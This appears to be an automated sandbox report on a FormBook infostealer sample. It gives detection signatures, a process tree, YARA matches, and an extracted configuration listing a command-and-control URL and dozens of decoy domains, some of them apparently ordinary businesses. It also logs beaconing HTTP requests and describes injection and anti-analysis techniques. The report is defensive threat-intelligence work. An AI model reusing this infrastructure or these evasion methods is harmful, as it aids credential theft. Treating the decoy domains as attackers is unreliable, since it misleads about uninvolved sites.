Loading ...

Play interactive tourEdit tour

Analysis Report XhU4EXUp0x.exe

Overview

General Information

Sample Name:XhU4EXUp0x.exe
Analysis ID:433531
MD5:49c83eceb8a816b959a778e5f2e78801
SHA1:ead9055c813de47edfec5bc46a0d896df4b4af2e
SHA256:2f4d0e2ce90ab2c35dcba4c85e38346eae6ac2cef0f939ccdd21cade4d6343ca
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • XhU4EXUp0x.exe (PID: 6968 cmdline: 'C:\Users\user\Desktop\XhU4EXUp0x.exe' MD5: 49C83ECEB8A816B959A778E5F2E78801)
    • XhU4EXUp0x.exe (PID: 6076 cmdline: C:\Users\user\Desktop\XhU4EXUp0x.exe MD5: 49C83ECEB8A816B959A778E5F2E78801)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 6340 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 3416 cmdline: /c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.yellow-wink.com/nff/"], "decoy": ["shinseikai.site", "creditmystartup.com", "howtovvbucks.com", "betterfromthebeginning.com", "oubacm.com", "stonalogov.com", "gentrypartyof8.com", "cuesticksandsupplies.com", "joelsavestheday.com", "llanobnb.com", "ecclogic.com", "miempaque.com", "cai23668.com", "miscdr.net", "twzhhq.com", "bloomandbrewcafe.com", "angcomleisure.com", "mafeeboutique.com", "300coin.club", "brooksranchhomes.com", "konversiondigital.com", "dominivision.com", "superiorshinedetailing.net", "thehomechef.global", "dating-web.site", "gcbsclubc.com", "mothererph.com", "pacleanfuel.com", "jerseryshorenflflagfootball.com", "roberthyatt.com", "wwwmacsports.com", "tearor.com", "american-ai.com", "mkyiyuan.com", "gempharmatechllc.com", "verdijvtc.com", "zimnik-bibo.one", "heatherdarkauthor.net", "dunn-labs.com", "automotivevita.com", "bersatubagaidulu.com", "gorillarecruiting.com", "mikecdmusic.com", "femuveewedre.com", "onyxmodsllc.com", "ooweesports.com", "dezeren.com", "foeweifgoor73dz.com", "sorchaashe.com", "jamiitulivu.com", "jifengshijie.com", "ranchfiberglas.com", "glendalesocialmediaagency.com", "icuvietnam.com", "404hapgood.com", "planetturmeric.com", "danfrem.com", "amazonautomationbusiness.com", "switchfinder.com", "diversifiedforest.com", "findnehomes.com", "rsyueda.com", "colombianmatrimony.com", "evan-dawson.info"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.XhU4EXUp0x.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.XhU4EXUp0x.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.XhU4EXUp0x.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x183f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1850c:$sqlite3step: 68 34 1C 7B E1
        • 0x18428:$sqlite3text: 68 38 2A 90 C5
        • 0x1854d:$sqlite3text: 68 38 2A 90 C5
        • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
        3.0.XhU4EXUp0x.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.0.XhU4EXUp0x.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.yellow-wink.com/nff/"], "decoy": ["shinseikai.site", "creditmystartup.com", "howtovvbucks.com", "betterfromthebeginning.com", "oubacm.com", "stonalogov.com", "gentrypartyof8.com", "cuesticksandsupplies.com", "joelsavestheday.com", "llanobnb.com", "ecclogic.com", "miempaque.com", "cai23668.com", "miscdr.net", "twzhhq.com", "bloomandbrewcafe.com", "angcomleisure.com", "mafeeboutique.com", "300coin.club", "brooksranchhomes.com", "konversiondigital.com", "dominivision.com", "superiorshinedetailing.net", "thehomechef.global", "dating-web.site", "gcbsclubc.com", "mothererph.com", "pacleanfuel.com", "jerseryshorenflflagfootball.com", "roberthyatt.com", "wwwmacsports.com", "tearor.com", "american-ai.com", "mkyiyuan.com", "gempharmatechllc.com", "verdijvtc.com", "zimnik-bibo.one", "heatherdarkauthor.net", "dunn-labs.com", "automotivevita.com", "bersatubagaidulu.com", "gorillarecruiting.com", "mikecdmusic.com", "femuveewedre.com", "onyxmodsllc.com", "ooweesports.com", "dezeren.com", "foeweifgoor73dz.com", "sorchaashe.com", "jamiitulivu.com", "jifengshijie.com", "ranchfiberglas.com", "glendalesocialmediaagency.com", "icuvietnam.com", "404hapgood.com", "planetturmeric.com", "danfrem.com", "amazonautomationbusiness.com", "switchfinder.com", "diversifiedforest.com", "findnehomes.com", "rsyueda.com", "colombianmatrimony.com", "evan-dawson.info"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: XhU4EXUp0x.exeVirustotal: Detection: 21%Perma Link
          Source: XhU4EXUp0x.exeReversingLabs: Detection: 26%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: XhU4EXUp0x.exeJoe Sandbox ML: detected
          Source: 3.2.XhU4EXUp0x.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.XhU4EXUp0x.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: XhU4EXUp0x.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: XhU4EXUp0x.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.669343721.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\YfQkSBryuS\src\obj\Debug\ProfileOptimization.pdb source: XhU4EXUp0x.exe
          Source: Binary string: wntdll.pdbUGP source: XhU4EXUp0x.exe, 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, raserver.exe, 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: XhU4EXUp0x.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: XhU4EXUp0x.exe, 00000003.00000002.707590458.000000000169A000.00000004.00000020.sdmp
          Source: Binary string: RAServer.pdbGCTL source: XhU4EXUp0x.exe, 00000003.00000002.707590458.000000000169A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.669343721.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_0B4EB2F0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_0B4EBD68
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_0B4EB2E1
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 4x nop then pop edi3_2_0040E442
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi12_2_00A9E442

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.yellow-wink.com/nff/
          Source: global trafficHTTP traffic detected: GET /nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwH HTTP/1.1Host: www.gentrypartyof8.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwH HTTP/1.1Host: www.rsyueda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 66.235.200.146 66.235.200.146
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-SEA-10US LEASEWEB-USA-SEA-10US
          Source: global trafficHTTP traffic detected: GET /nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwH HTTP/1.1Host: www.gentrypartyof8.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwH HTTP/1.1Host: www.rsyueda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.gentrypartyof8.com
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000005.00000000.660621066.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: XhU4EXUp0x.exe, 00000000.00000002.653237651.00000000009F0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00419D50 NtCreateFile,3_2_00419D50
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00419E00 NtReadFile,3_2_00419E00
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00419E80 NtClose,3_2_00419E80
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00419F30 NtAllocateVirtualMemory,3_2_00419F30
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00419DA9 NtReadFile,3_2_00419DA9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00419E7A NtClose,3_2_00419E7A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00419F2D NtAllocateVirtualMemory,3_2_00419F2D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019999A0 NtCreateSection,LdrInitializeThunk,3_2_019999A0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01999910
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019998F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_019998F0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999840 NtDelayExecution,LdrInitializeThunk,3_2_01999840
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999860 NtQuerySystemInformation,LdrInitializeThunk,3_2_01999860
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01999A00
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999A20 NtResumeThread,LdrInitializeThunk,3_2_01999A20
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999A50 NtCreateFile,LdrInitializeThunk,3_2_01999A50
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019995D0 NtClose,LdrInitializeThunk,3_2_019995D0
